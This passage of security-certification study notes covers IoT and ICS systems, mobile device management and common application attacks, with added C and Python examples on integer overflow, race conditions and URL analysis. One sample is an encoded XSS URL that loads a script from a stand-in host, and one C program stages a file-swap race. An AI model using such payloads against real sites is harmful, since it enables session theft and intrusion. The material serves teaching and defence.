■ LTE Machine Type Communication (LTE-M)—this is another low-
power system, but supports higher bandwidth (up to about 1 Mbps).
○ Any LTE-based cellular radio uses a subscriber identity module (SIM)
card as an identifier.
● Z-Wave and Zigbee:
○ Z-Wave and Zigbee are wireless communications protocols used primarily
for home automation.
○ In Z-Wave, devices can be configured to work as repeaters to extend the
network but there is a limit of four "hops" between a controller device and
an endpoint.
○ Zigbee: Low-power wireless communications open source protocol used
primarily for home automation.
■ ZigBee uses radio frequencies in the 2.4 GHz band and a mesh
topology.

Industrial Control Systems


● Workflow and Process Automation Systems:
○ Industrial control systems (ICSs): A network managing embedded devices
(computer systems that are designed to perform a specific, dedicated
function).
○ An ICS comprises plant devices and equipment with embedded PLCs.
■ The PLCs are linked either by an OT fieldbus serial network or by
industrial Ethernet to actuators that operate valves, motors, circuit
breakers, and other mechanical components, plus sensors that
monitor some local state, such as temperature.
○ Output and configuration of a PLC is performed by one or more human-
machine interfaces (HMIs).
■ An HMI might be a local control panel or software running on a
computing host.
○ Another important concept is the data historian, which is a database of all
the information generated by the control loop.
● Supervisory Control and Data Acquisition (SCADA):
○ A supervisory control and data acquisition (SCADA) system takes the
place of a control server in large-scale, multiple-site ICSs.
○ SCADA typically runs as software on ordinary computers, gathering data
from and managing plant devices and equipment with embedded PLCs,
referred to as field devices.
● ICS/SCADA Applications:
○ Energy refers to power generation and distribution. More widely, utilities
include water/sewage and transportation networks.
○ Industrial can refer specifically to the process of mining and refining raw
materials, involving hazardous high heat and pressure furnaces, presses,
centrifuges, pumps, and so on.
○ Fabrication and manufacturing refer to creating components and
assembling them into products.

Internet of Things
● The term Internet of Things (IoT) is used to describe a global network of
appliances and personal devices that have been equipped with sensors,
software, and network connectivity.

Specialized Systems for Facility Automation


● Building Automation System (BAS):
○ A building automation system (BAS) for offices and data centers
("smart buildings") can include physical access control systems, but also
heating, ventilation, and air conditioning (HVAC), fire control, power and
lighting, and elevators and escalators.
○ Some typical vulnerabilities that affect these systems include:
■ Process and memory vulnerabilities, such as buffer overflow, in the
PLCs.
■ Use of plaintext credentials or cryptographic keys within application
code.
■ Code injection via the graphical web application interfaces used to
configure and monitor systems.
○ It is possible that control of these systems could be used to perform some
sort of DoS or ransom demand (consider disrupting HVAC controls within
a data center, for instance).
● Smart Meters:
○ A smart meter provides continually updating reports of electricity, gas, or
water usage to the supplier, reducing the need for manual inspections.
○ Most meters use cellular data for communication back to the supplier, and
an IoT protocol, such as ZigBee, for integration with smart appliances.
● Surveillance Systems:
○ A physical access control system (PACS) is a network of monitored locks,
intruder alarms, and video surveillance.

Specialized Systems in IT
● Multifunction Printers (MFPs):
○ Often these print/scan/fax functions are performed by single devices,
referred to as multifunction printers (MFPs).
■ Any device that performs more than one function, but typically print
devices that can also scan and fax.
○ Some of the more feature-rich, networked printers and MFPs can also be
used as a pivot point to attack the rest of the network.
● Voice over IP (VoIP):
○ Types of embedded systems are used to implement both Voice over IP
(VoIP) endpoints and media gateways.

Specialized Systems for Vehicles and Drones


● Automobiles and unmanned aerial vehicles (UAV), or drones, contain
sophisticated electronics to control engine and power systems, braking and
landing, and suspension/stability.
● The locking, alarm, and engine immobilizer mechanisms are also likely to be part
of the same system.
○ Each of these subsystems is implemented as an electronic control unit
(ECU), connected via one or more controller area network (CAN) serial
communications buses.
● The CAN bus operates in a somewhat similar manner to shared Ethernet and
was designed with just as little security.
○ A serial network designed to allow communications between embedded
programmable logic controllers.

Specialized Systems for Medical Devices


● As well as unsecure communication protocols, many of the control systems for
these devices run on unsupported versions of operating systems (such as
Windows XP) because updating the software to work with newer OS
versions is costly and disruptive to patient services.
● Some of the goals of attacks on medical devices and services are as follows:
○ Use compromised devices to pivot to networks storing medical data with
the aim of stealing protected health information (PHI).
○ Hold medical units ransom by threatening to disrupt services.
○ Kill or injure patients (or threaten to do so) by tampering with dosage
levels or device settings.

Security for Embedded Systems
● Network Segmentation:
○ Network access for static environments should only be required for
applying firmware updates and management controls from the host
software to the devices and for reporting status and diagnostic information
from the devices back to the host software.
○ This control network should be separated from the corporate network
using firewalls and VLANs.
○ With environments such as SCADA, the management software may
require legacy versions of operating systems, making the hosts
particularly difficult to secure.
○ Isolating these hosts from others through network segmentation and using
endpoint security (preventing the attachment of USB devices) can help to
ensure they do not become infected with malware or exposed to network
exploits.
● Wrappers:
○ One way of increasing the security of data in transit for embedded
systems is through the use of wrappers, such as IPSec.
○ The only thing visible to an attacker or anyone sniffing the wire is the
IPSec header, which describes only the tunnel endpoints.
○ This is useful for protecting traffic between trusted networks when the
traffic has to go through an untrusted network to go between them, or
between trusted nodes on the same network.
● Firmware Code Control and Inability to Patch:
○ Firmware patching is just as vital as keeping host OS software up to date,
but for many embedded systems, it is far more of a challenge:
■ Many embedded systems and IoT devices use low-cost firmware
chips and the vendor never produces updates to fix security
problems or only produces updates for a relatively short product
cycle (while the device could remain in operational use for much
longer).
■ Many embedded systems require manual updates, which are
perceived as too time-consuming for a security department with
other priorities to perform.
■ Availability is a key attribute for most embedded deployments.
Patching without service interruption may not be possible, and
opportunities for downtime servicing extremely limited.

Lesson 13: Implementing Secure Mobile Solutions

Mobile Device Deployment Models


● A mobile device deployment model describes the way employees are provided
with mobile devices and applications.
● Bring your own device (BYOD)—the mobile device is owned by the employee.
● Corporate owned, business only (COBO)—the device is the property of the
company and may only be used for company business.
● Corporate owned, personally-enabled (COPE)—the device is chosen and
supplied by the company and remains its property.
● Choose your own device (CYOD)—much the same as COPE but the employee
is given a choice of device from a list.

Enterprise Mobility Management


● There are two main functions of an EMM product suite:
○ Mobile device management (MDM)—sets device policies for
authentication, feature use (camera and microphone), and connectivity.
○ Mobile application management (MAM)—sets policies for apps that can
process corporate data, and prevents data transfer to personal apps.
● Unified Endpoint Management:
○ Enterprise software for controlling device settings, apps, and corporate
data storage on all types of fixed, mobile, and IoT computing devices.
○ When the device is enrolled with the management software, it can be
configured with policies to allow or restrict use of apps, corporate data,
and built-in functions, such as a video camera or microphone.

iOS in the Enterprise


● Apps have to be submitted to and approved by Apple before they are released to
users via the App Store.
● Corporate control over iOS devices and distribution of corporate and B2B
(Business-to-Business) apps is facilitated by participating in the Device
Enrollment Program (support.apple.com/business), the Volume Purchase
Program, and the Developer Enterprise Program
(developer.apple.com/programs/enterprise).

Android in the Enterprise


● iOS devices are normally updated very quickly. With Android, the situation is less
consistent, as updates often depend on the handset vendor to complete the new
version or issue the patch for their flavor of Android.
● SEAndroid: Since version 4.3, Android has been based on Security-Enhanced
Linux, enabling granular permissions for apps, container isolation, and storage
segmentation.

Mobile Access Control Systems


● Context-Aware Authentication:
○ An access control scheme that verifies an object's identity based on
various environmental factors, like time, location, and behavior.
○ For example, smartphones now allow users to disable screen locks when
the device detects that it is in a trusted location, such as the home.

Remote Wipe
● A remote wipe or kill switch means that if the handset is stolen it can be set to
the factory defaults or cleared of any personal data (sanitization).
● The remote wipe could be triggered by several incorrect passcode attempts or by
enterprise management software.
● In theory, a thief can prevent a remote wipe by ensuring the phone cannot
connect to the network, then hacking the phone and disabling the security.

Full Device Encryption and External Media


● In iOS, there are various levels of encryption.
○ All user data on the device is always encrypted but the key is stored on
the device.
■ This is primarily used as a means of wiping the device. The OS just
needs to delete the key to make the data inaccessible rather than
wiping each storage location.
○ Email data and any apps using the "Data Protection" option are subject to
a second round of encryption using a key derived from and protected by
the user's credential.
■ This provides security for data in the event that the device is stolen.
Not all user data is encrypted using the "Data Protection" option;
contacts, SMS messages, and pictures are not, for example.
○ In iOS, Data Protection encryption is enabled automatically when you
configure a password lock on the device.
● In Android, there are substantial differences to encryption options between
versions.
○ As of Android 10, there is no full disk encryption as it is considered too
detrimental to performance. User data is encrypted at file-level by default.
○ Some Android handsets support removable storage using external media,
such as a plug-in Micro SecureDigital (SD) card slot.

Location Services
● Geolocation is the use of network attributes to identify (or estimate) the physical
position of a device.
● The device uses location services to determine its current position. Location
services can make use of two systems:
○ Global Positioning System (GPS)—a means of determining the device's
latitude and longitude based on information received from satellites via a
GPS sensor.
○ Indoor Positioning System (IPS)—works out a device's location by
triangulating its proximity to other radio sources, such as cell towers, Wi-Fi
access points, and Bluetooth/RFID beacons.
● Geofencing and Camera/Microphone Enforcement:
○ Geofencing is the practice of creating a virtual boundary based on real-
world geography.
● GPS Tagging:
○ GPS tagging is the process of adding geographical identification
metadata, such as the latitude and longitude where the device was
located at the time, to media such as photographs, SMS messages, video,
and so on.
○ GPS tagged pictures uploaded to social media could be used to track a
person's movements and location.

Application Management
● When a device is joined to the corporate network through enrollment with
management software, it can be configured into an enterprise workspace mode
in which only a certain number of authorized applications can run.
● A trusted app source is one that is managed by a service provider.
● The service provider authenticates and authorizes valid developers, issuing them
with a certificate to use to sign their apps and warrant them as trusted.
● It may also analyze code submitted to ensure that it does not pose a security or
privacy risk to its customers (or remove apps that are discovered to pose such a
risk).
● It might not be appropriate to deliver a custom corporate app via a public store,
where anyone could download it.
○ Apple operates enterprise developer and distribution programs to solve
this problem, allowing private app distribution via Apple Business
Manager.

Content Management
● Containerization allows the employer to manage and maintain the portion of the
device that interfaces with the corporate network.
● An enterprise workspace with a defined selection of apps and a separate
container is created.
○ This container isolates corporate apps from the rest of the device.
○ The container can also enforce storage segmentation.

Rooting and Jailbreaking


● Rooting—this term is associated with Android devices. Some vendors provide
authorized mechanisms for users to access the root account on their device.
● Jailbreaking—iOS is more restrictive than Android so the term "jailbreaking"
became popular for exploits that enabled the user to obtain root privileges,
sideload apps, change or add carriers, and customize the interface.
○ iOS jailbreaking is accomplished by booting the device with a patched
kernel.
● Carrier unlocking—for either iOS or Android, this means removing the
restrictions that lock a device to a single carrier.

Cellular and GPS Connection Methods


● Cellular Data Connections:
○ A cellular data connection is less likely to be subject to monitoring and
filtering.
○ There have been attacks and successful exploits against the major
infrastructure and protocols underpinning the telecoms network, notably
the SS7 hack.
● Global Positioning System (GPS): a sensor triangulates the device position using
signals from orbital GPS satellites.
○ As this triangulation process can be slow, most smartphones use Assisted
GPS (A-GPS) to obtain coordinates from the nearest cell tower and adjust
for the device's position relative to the tower.
○ GPS signals can be jammed or even spoofed using specialist radio
equipment. This might be used to defeat geofencing mechanisms, for
instance.

Bluetooth Connection Methods


● Bluetooth devices have a few known security issues:
○ Device discovery—a device can be put into discoverable mode meaning
that it will connect to any other Bluetooth devices nearby. Unfortunately,
even a device in non-discoverable mode is quite easy to detect.
○ Authentication and authorization—devices authenticate ("pair") using a
simple passkey configured on both devices.
○ Malware—there are proof-of-concept Bluetooth worms and application
exploits, most notably the BlueBorne exploit (armis.com/blueborne), which
can compromise any active and unpatched system regardless of whether
discovery is enabled and without requiring any user intervention.
● Bluejacking: spam where someone sends you an unsolicited text (or
picture/video) message or vCard (contact details).
○ This can also be a vector for malware, as demonstrated by the Obad
Android Trojan malware.
● Bluesnarfing refers to using an exploit in Bluetooth to steal information from
someone else's phone.
○ The exploit (now patched) allows attackers to circumvent the
authentication mechanism.

Infrared and RFID Connection Methods


● Infrared signaling has been used for PAN in the past (IrDA), but the use of
infrared in modern smartphones and wearable technology focuses on two other
uses:
○ IR blaster—this allows the device to interact with an IR receiver and
operate a device such as a TV or HVAC monitor as though it were the
remote control handset.
○ IR sensor—these are used as proximity sensors (to detect when a
smartphone is being held to the ear, for instance) and to measure health
information (such as heart rate and blood oxygen levels).
● Radio Frequency ID (RFID) is a means of encoding information into passive
tags, which can be easily attached to devices, structures, clothing, or almost
anything else.
○ When a reader is within range of the tag, it produces an electromagnetic
wave that powers up the tag and allows the reader to collect information
from it or to change the values encoded in the tag.
● One type of RFID attack is skimming, which is where an attacker uses a
fraudulent RFID reader to read the signals from a contactless bank card.
○ Any reader can access any data stored on any RFID tag, so sensitive
information must be protected using cryptography.

Near Field Communications and Mobile Payment Services


● NFC is based on a particular type of radio frequency ID (RFID).
○ An NFC chip can also be used to read passive RFID tags at close range.
○ It can also be used to configure other types of connections (pairing
Bluetooth devices for instance) and for exchanging information, such as
contact cards.
● NFC does not provide encryption, so eavesdropping and man-in-the-middle
attacks are possible if the attacker can find some way of intercepting the
communication and the software services are not encrypting the data.
● To configure a payment service, the user enters their credit card information into
a mobile wallet app on the device.
○ The wallet app does not transmit the original credit card information, but a
one-time token that is interpreted by the card merchant and linked back to
the relevant customer account.
● Despite having a close physical proximity requirement, NFC is vulnerable to
several types of attacks.
○ Certain antenna configurations may be able to pick up the RF signals
emitted by NFC from several feet away, giving an attacker the ability to
eavesdrop from a more comfortable distance.
○ An attacker with a reader may also be able to skim information from an
NFC device in a crowded area, such as a busy train station.

USB Connection Methods


● Some Android USB ports support USB On The Go (OTG) and there are
adapters for iOS devices.
○ USB OTG allows a port to function either as a host or as a device.
○ For example, a port on a smartphone might operate as a device when
connected to a PC, but as a host when connected to a keyboard or
external hard drive.
○ This function is determined by the state of a 5th pin in the connector.

SMS/MMS/RCS and Push Notifications


● The Short Message Service (SMS) and Multimedia Message Service (MMS)
are operated by the cellular network providers.
○ They allow transmission of text messages and binary files.
● Rich Communication Services (RCS) is designed as a platform-independent
advanced messaging app, with a similar feature set to proprietary apps like
WhatsApp and iMessage.
○ These features include support for video calling, larger binary
attachments, group messaging/calling, and read receipts.
● Push Notifications:

Firmware Over-the-Air Updates
● A baseband update modifies the firmware of the radio modem used for cellular,
Wi-Fi, Bluetooth, NFC, and GPS connectivity.
● Over-the-air (OTA): A firmware update delivered on a cellular data connection.

Microwave Radio Connection Methods


● Microwave radio is also used as a backhaul link from a cell tower to the service
provider's network.
● A microwave link can be provisioned in two modes:
○ Point-to-point (P2P) microwave uses high-gain antennas to link two sites.
■ Each antenna is pointed directly at the other. In terms of security,
this makes it difficult to eavesdrop on the signal, as an intercepting
antenna would have to be positioned within the direct path.
○ Point-to-multipoint (P2M) microwave uses smaller sectoral antennas,
each covering a separate quadrant.
■ Where P2P is between two sites, P2M links multiple sites or
subscriber nodes to a single hub.
■ Because of the higher risk of signal interception compared to P2P,
it is crucial that links be protected by over-the-air encryption.

Lesson 14: Summarizing Secure Application Concepts

Application Attacks
● An application vulnerability is a design flaw that can cause the application
security system to be circumvented or that will cause the application to crash.
● Privilege Escalation:
○ The purpose of most application attacks is to allow the threat actor to run
his or her own code on the system.
■ This is referred to as arbitrary code execution.
○ Where the code is transmitted from one machine to another, it can be
referred to as remote code execution.
○ Depending on how the software is written, a process may run using a
system account, the account of the logged-on user, or a nominated
account.
○ There are two main types of privilege escalation:
■ Vertical privilege escalation (or elevation) is where a user or
application can access functionality or data that should not be
available to them.
● For instance, a process might run with local administrator
privileges, but a vulnerability allows the arbitrary code to run
with higher system privileges.
■ Horizontal privilege escalation is where a user accesses
functionality or data that is intended for another user.
● For instance, via a process running with local administrator
privileges on a client workstation, the arbitrary code is able
to execute as a domain account on an application server.
● Error Handling:
○ An application attack may cause an error message.
○ In Windows, this may be of the following types: "Instruction could not be
read or written," "Undefined exception," or "Process has encountered a
problem."
○ One issue for error handling is that the application should not reveal
configuration or platform details that could help an attacker.
● Improper Input Handling:
○ Most software accepts user input of some kind, whether the input is typed
manually or passed to the program by another program, such as a
browser passing a URL to a web server or a Windows process using
another process via its application programming interface.

Overflow Vulnerabilities
● In an overflow attack, the threat actor submits input that is too large to be stored
in a variable assigned by the application.
● Unsuccessful attempts may be revealed through unexplained crashes or error
messages following a file download, execution of a new app or a script, or
connection of new hardware.
● Buffer Overflow:
○ A buffer is an area of memory that the application reserves to store
expected data.
○ To exploit a buffer overflow vulnerability, the attacker passes data that
deliberately overfills the buffer.
○ One of the most common vulnerabilities is a stack overflow.
■ The stack is an area of memory used by a program subroutine. It
includes a return address, which is the location of the program that
has called the subroutine.
● Integer Overflow:
○ An attack in which a computed result is too large to fit in its assigned
storage space, which may lead to crashing or data corruption, and may
trigger a buffer overflow.
○ This may cause a positive number to become negative (changing a bank
debit to a credit, for instance). It could also be used where the software is
calculating a buffer size.
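
The two cases in the integer overflow notes above, as an added C example that is not part of the original notes: a 32-bit buffer-size calculation that wraps to a tiny value, and a signed balance that turns negative, each beside a range check that rejects the input. All function names and sample values are assumptions made for the example.

```c
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>

/* Vulnerable pattern: the 32-bit product wraps modulo 2^32 with no error. */
uint32_t unchecked_alloc_size(uint32_t count, uint32_t record_size)
{
    return count * record_size;
}

/* Hardened: refuse any request whose true product does not fit in 32 bits. */
int checked_alloc_size(uint32_t count, uint32_t record_size, uint32_t *out)
{
    if (record_size != 0 && count > UINT32_MAX / record_size)
        return -1;
    *out = count * record_size;
    return 0;
}

/* Allocation helper built on the checked size; NULL means "rejected". */
void *alloc_records(uint32_t count, uint32_t record_size)
{
    uint32_t bytes;
    if (checked_alloc_size(count, record_size, &bytes) != 0 || bytes == 0)
        return NULL;
    return malloc(bytes);
}

/*
 * Signed case: a balance in cents held in 32 bits. Signed overflow is
 * undefined behaviour in C, so the range is tested before the addition.
 */
int checked_add_cents(int32_t balance, int32_t amount, int32_t *out)
{
    if ((amount > 0 && balance > INT32_MAX - amount) ||
        (amount < 0 && balance < INT32_MIN - amount))
        return -1;
    *out = balance + amount;
    return 0;
}

/*
 * What two's-complement storage ends up holding when the check is skipped.
 * The unsigned-to-signed conversion is implementation-defined; GCC and
 * Clang reduce it modulo 2^32.
 */
int32_t wrapped_add_cents(int32_t balance, int32_t amount)
{
    return (int32_t)((uint32_t)balance + (uint32_t)amount);
}

int main(void)
{
    /* Constructed input: 0x40000001 records of 4 bytes each. */
    uint32_t count = 0x40000001u, size = 4u, bytes = 0;

    printf("unchecked size: %u bytes for %u records\n",
           (unsigned)unchecked_alloc_size(count, size), (unsigned)count);
    printf("checked size:   %s\n",
           checked_alloc_size(count, size, &bytes) == 0 ? "accepted" : "rejected");
    printf("INT32_MAX + 1 wraps to %d\n", (int)wrapped_add_cents(INT32_MAX, 1));
    return 0;
}
```

With the unchecked size, a caller would allocate 4 bytes and then copy over a billion records into it, which is how an integer overflow becomes a buffer overflow.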

NULL Pointer Dereferencing and Race Conditions


● In C/C++ programming, a pointer is a variable that stores a memory location,
rather than a value.
● If the memory location is invalid or null (perhaps by some malicious process
altering the execution environment), this creates a null pointer dereference type
of exception, and the process will probably crash.
● Race conditions occur when the outcome from an execution process is directly
dependent on the order and timing of certain events, and those events fail to
execute in the order and timing intended by the developer.
● A time of check to time of use (TOCTTOU) race condition occurs when there is
a change between when an app checked a resource and when the app used the
resource.
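
The TOCTTOU window described above, as an added C example (POSIX; not part of the original notes): one routine checks a file by name and then opens it by name, the other opens first and checks the object behind the descriptor. The 4-byte size policy, the file names, and the `swap_target` helper that stands in for a concurrent change are all assumptions constructed for the example.

```c
#define _POSIX_C_SOURCE 200809L
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <sys/stat.h>
#include <unistd.h>

#define MAX_UPLOAD 4 /* constructed policy: accept files of at most 4 bytes */

typedef void (*window_fn)(void);

static char g_target[64], g_other[64]; /* constructed sample paths */

/* Stands in for another process changing the resource inside the window. */
static void swap_target(void) { rename(g_other, g_target); }

/* Read until EOF or until more than cap bytes have arrived; returns the count. */
static long drain(int fd, long cap)
{
    char buf[64];
    long total = 0;
    ssize_t n;
    while (total <= cap && (n = read(fd, buf, sizeof buf)) > 0)
        total += n;
    return total;
}

/* Vulnerable: the check and the use each resolve the path name separately. */
long racy_consume(const char *path, window_fn between)
{
    struct stat st;
    if (stat(path, &st) != 0 || !S_ISREG(st.st_mode) || st.st_size > MAX_UPLOAD)
        return -1;                         /* time of check */
    if (between) between();                /* the resource changes here */
    int fd = open(path, O_RDONLY);         /* time of use: maybe another file */
    if (fd < 0) return -1;
    long n = drain(fd, 1L << 20);
    close(fd);
    return n;
}

/* Hardened: open once, then check and read the same object via the descriptor. */
long safe_consume(const char *path, window_fn between)
{
    int fd = open(path, O_RDONLY | O_NOFOLLOW); /* refuse a symlink as last component */
    if (fd < 0) return -1;
    if (between) between();                /* renaming the path no longer matters */
    struct stat st;
    if (fstat(fd, &st) != 0 || !S_ISREG(st.st_mode) || st.st_size > MAX_UPLOAD) {
        close(fd);
        return -1;
    }
    long n = drain(fd, MAX_UPLOAD);        /* bounded read covers in-place growth */
    close(fd);
    return n > MAX_UPLOAD ? -1 : n;
}

static int write_file(const char *path, const char *data, size_t len)
{
    FILE *f = fopen(path, "wb");
    if (!f) return -1;
    size_t w = fwrite(data, 1, len, f);
    return (fclose(f) == 0 && w == len) ? 0 : -1;
}

/* Builds a 1-byte file that passes the check and a 5-byte file that would not,
 * swaps them inside the window, and returns the bytes actually consumed. */
long run_demo(int hardened)
{
    char dir[] = "/tmp/toctou-XXXXXX";
    if (!mkdtemp(dir)) return -2;
    snprintf(g_target, sizeof g_target, "%s/upload.bin", dir);
    snprintf(g_other, sizeof g_other, "%s/other.bin", dir);
    if (write_file(g_target, "A", 1) || write_file(g_other, "BBBBB", 5))
        return -2;
    long n = hardened ? safe_consume(g_target, swap_target)
                      : racy_consume(g_target, swap_target);
    unlink(g_target);
    unlink(g_other);
    rmdir(dir);
    return n;
}

int main(void)
{
    printf("check-then-use consumed %ld bytes\n", run_demo(0));
    printf("open-then-check consumed %ld bytes\n", run_demo(1));
    return 0;
}
```

The first routine approves a 1-byte file and then reads 5 bytes from the file that replaced it; the second reads the 1-byte file it actually checked.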

Memory Leaks and Resource Exhaustion


● If a process is operating correctly, when it no longer requires a block of memory,
it should release it.
● If the program code does not do this, it could create a situation where the system
continually leaks memory to the faulty process.
○ This means less memory is available to other processes and the system
could crash.
● Memory leaks are particularly serious in service/background applications, as
they will continue to consume memory over an extended period.
● More generally, a malicious process might cause denial of service or set up the
conditions for privilege escalation via resource exhaustion.
○ Resources refers to CPU time, system memory allocation, fixed disk
capacity, and network utilization.

DLL Injection and Driver Manipulation


● A dynamic link library (DLL) is a binary package that implements some sort of
standard functionality, such as establishing a network connection or performing
cryptography.
● DLL Injection:
○ A software vulnerability that can occur when a Windows-based application
attempts to force another running application to load a Dynamic Link
Library (DLL) in memory that could cause the victim application to
experience instability or leak sensitive information.
○ The link library will contain whatever functions the malware author wants
to be able to run.
○ Malware uses this technique to move from one host process to another to
avoid detection.
○ A process that has been compromised by DLL injection might open
unexpected network connections, or interact with files and the registry
suspiciously.
○ It must also evade detection by anti-virus software. One means of doing
this is code refactoring.
■ Refactoring means that the code performs the same function by
using different methods (control blocks, variable types, and so on).
○ Shim: The process of developing and implementing additional code
between an application and the operating system to enable functionality
that would otherwise be unavailable.

Pass the Hash Attack


● Attackers can extend their lateral movement by a great deal if they are able to
compromise host credentials.
● One common credential exploit technique for lateral movement is called pass
the hash (PtH).
○ This is the process of harvesting an account's cached credentials when
the user is logged into a single sign-on (SSO) system so the attacker can
use the credentials on other systems.
● Pass the hash is relatively difficult to detect, as it exploits legitimate network
behavior.


Uniform Resource Locator Analysis
● A uniform resource locator (URL) can encode some action or data to submit to
the server host. This is a common vector for malicious activity.


● HTTP Methods:
○ An HTTP session starts with a client (a user-agent, such as a web
browser) making a request to an HTTP server.
○ The request establishes a TCP connection.
○ This TCP connection can be used for multiple requests, or a client can
start new TCP connections for different requests.
○ A request typically comprises a method, a resource (such as a URL path),
version number, headers, and body.
○ Data can be submitted to a server either by using a POST or PUT method
and the HTTP headers and body, or by encoding the data within the URL
used to access the resource.
○ Data submitted via a URL is delimited by the ? character, which follows
the resource path.
● Percent Encoding:
○ A URL can contain only unreserved and reserved characters from the
ASCII set.
○ Reserved ASCII characters are used as delimiters within the URL syntax
and should only be used unencoded for those purposes.
○ The reserved characters are:
■ : / ? # [ ] @ ! $ & ' ( ) * + , ; =
○ There are also unsafe characters, which cannot be used in a URL.
■ Control characters, such as null string termination, carriage return,
line feed, end of file, and tab, are unsafe.
○ Percent encoding allows a user-agent to submit any safe or unsafe
character (or binary data) to the server within the URL.
○ Percent encoding can be misused to obfuscate the nature of a URL
(encoding unreserved characters) and submit malicious input.
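
The percent-encoding checks described above, written out as an added example for URL analysis (it is not part of the original notes). The finding names and the second sample URL are constructed; the first sample is the encoded URL that appears in the cross-site scripting notes.

```python
import re
from urllib.parse import urlsplit, unquote

# Unreserved characters never need percent encoding (RFC 3986), so an
# encoded one is a sign that the URL is hiding what it contains.
UNRESERVED = set(
    "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789-._~"
)
PCT = re.compile(r"%([0-9A-Fa-f]{2})")
MAX_ROUNDS = 5  # upper bound on repeated decoding


def analyze_url(url):
    """Decode the path and query of a URL and report encoding anomalies."""
    parts = urlsplit(url)
    raw = parts.path + ("?" + parts.query if parts.query else "")
    encoded = [chr(int(h, 16)) for h in PCT.findall(raw)]
    findings = []

    hidden = "".join(c for c in encoded if c in UNRESERVED)
    if hidden:
        findings.append("encoded-unreserved:" + hidden)
    # Control characters (NUL, CR, LF, tab and so on) are unsafe in a URL.
    if any(ord(c) < 0x20 or ord(c) == 0x7F for c in encoded):
        findings.append("encoded-control-character")

    # Decode until nothing is left to decode; more than one round means
    # the input was encoded more than once.
    decoded, rounds = raw, 0
    while rounds < MAX_ROUNDS and PCT.search(decoded):
        decoded = unquote(decoded)
        rounds += 1
    if rounds > 1:
        findings.append("nested-encoding")
    if "<" in decoded or ">" in decoded:
        findings.append("markup-in-decoded-url")
    return {"decoded": decoded, "rounds": rounds, "findings": findings}


# Sample 1 is the URL from the XSS notes; sample 2 is constructed.
SAMPLE_FROM_NOTES = (
    "https://trusted.foo/messages?user=James%3Cscript%20src%3D%22https"
    "%3A%2F%2Fbadsite.foo%2Fhook.js%22%3E%3C%2Fscript%3E"
)
SAMPLE_CONSTRUCTED = "https://trusted.foo/%61dmin?file=%252e%252e%252fconfig%0d%0a"

if __name__ == "__main__":
    for sample in (SAMPLE_FROM_NOTES, SAMPLE_CONSTRUCTED):
        print(analyze_url(sample))
```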

Application Programming Interface Attacks


● If the API isn't secure, threat actors can easily take advantage of it to
compromise the services and data stored on the web application.
● Some other common attacks against APIs target the following weaknesses and
vulnerabilities:
○ Ineffective secrets management, allowing threat actors to discover an API
key and perform any action authorized to that key.
○ Lack of input validation, allowing the threat actor to insert arbitrary
parameters into API methods and queries. This is often referred to as
allowing unsanitized input.
○ Error messages revealing clues to a potential adversary. For example, an
authentication error should not reveal whether a valid username has been
rejected because of an invalid password. The error should simply indicate
an authentication failure.
○ Denial of service (DoS) by bombarding the API with spurious calls.
Protection against this attack can be provided through
throttling/rate-limiting mechanisms.

Replay Attacks
● Session management is particularly important when it comes to user
authentication, as it is required to ensure the integrity of the account and the
confidentiality of data associated with it.
● To establish a session, the server normally gives the client some type of token.
● A replay attack works by sniffing or guessing the token value and then
submitting it to re-establish the session illegitimately.
● HTTP is nominally a stateless protocol, meaning that the server preserves no
information about the client, but mechanisms such as cookies have been
developed to preserve stateful data.
○ A cookie is created when the server sends an HTTP response header with
the cookie data.
○ A cookie has a name and value, plus optional security and expiry
attributes.

Session Hijacking and Cross-Site Request Forgery


● In the context of a web application, session hijacking most often means
replaying a cookie in some way.
● Attackers can sniff network traffic to obtain session cookies sent over an
unsecured network, like a public Wi-Fi hotspot.
● To counter cookie hijacking, you can encrypt cookies during the transmission
process, delete cookies from the client's browser cache when the client
terminates the session, and design your web app to deliver a new cookie with
each new session between the app and the client's browser.
● Session prediction attacks focus on identifying possible weaknesses in the
generation of session tokens that will enable an attacker to predict future valid
session values.
○ If an attacker can predict the session token, then the attacker can take
over a session that has yet to be established.
● Cross-Site Request Forgery:
○ A client-side or cross-site request forgery (CSRF or XSRF) can exploit
applications that use cookies to authenticate users and track sessions.
○ To work, the attacker must convince the victim to start a session with the
target site.
○ The attacker must then pass an HTTP request to the victim's browser that
spoofs an action on the target site, such as changing a password or an
email address.
○ If the target site assumes that the browser is authenticated because there
is a valid session cookie and doesn't complete any additional authorization
process on the attacker's input (or if the attacker is able to spoof the
authorization), it will accept the input as genuine.


● Clickjacking:
○ Clickjacking is an attack where what the user sees and trusts as a web
application with some sort of login page or form contains a malicious layer
or invisible iFrame (a web page embedded inside another web page) that
allows an attacker to intercept or redirect user input.
○ Clickjacking can be mitigated by using HTTP response headers that
instruct the browser not to open frames from different origins (domains)
and by ensuring that any buttons or input boxes on a page are positioned
on the top-most layer.
● SSL Strip:
○ A Secure Sockets Layer (SSL) strip attack is launched against clients on a
local network as they try to make connections to websites.
○ The threat actor must first perform a Man-in-the-Middle attack via Address
Resolution Protocol (ARP) poisoning to masquerade as the default
gateway.
○ When a client requests an HTTP site that redirects to an HTTPS site in an
unsafe way, the sslstrip utility (https://github.com/moxie0/sslstrip) proxies
the request and response, serving the client the HTTP site, hopefully with
an unencrypted login form.
○ If the user enters credentials, they will be captured by the threat actor.
Sites can use the HTTP Strict Transport Security (HSTS) lists maintained
by browsers to prevent clients requesting HTTP in the first place.

Cross-Site Scripting
● A cross-site scripting (XSS) attack exploits the fact that the browser is likely to
trust scripts that appear to come from a site the user has chosen to visit.
● XSS inserts a malicious script that appears to be part of the trusted site. A
nonpersistent type of XSS attack would proceed as follows:
○ 1. The attacker identifies an input validation vulnerability in the trusted site.
○ 2. The attacker crafts a URL to perform a code injection against the
trusted site. This could be coded in a link from the attacker's site to the
trusted site or a link in an email message.
○ 3. When the user clicks the link, the trusted site returns a page containing
the malicious code injected by the attacker. As the browser is likely to be
configured to allow the site to run scripts, the malicious code will execute.
● The malicious code could be used to deface the trusted site (by adding any sort
of arbitrary HTML code), steal data from the user's cookies, try to intercept
information entered into a form, perform a request forgery attack, or try to install
malware.
● An attack where the malicious input comes from a crafted link is a reflected or
nonpersistent XSS attack.
○ A stored/persistent XSS attack aims to insert code into a back-end
database or content management system used by the trusted site.
○ For example, the attacker may submit a post to a bulletin board with a
malicious script embedded in the message.
○ When other users view the message, the malicious script is executed. For
example, with no input sanitization, a threat actor could type the following
into a new post text field:
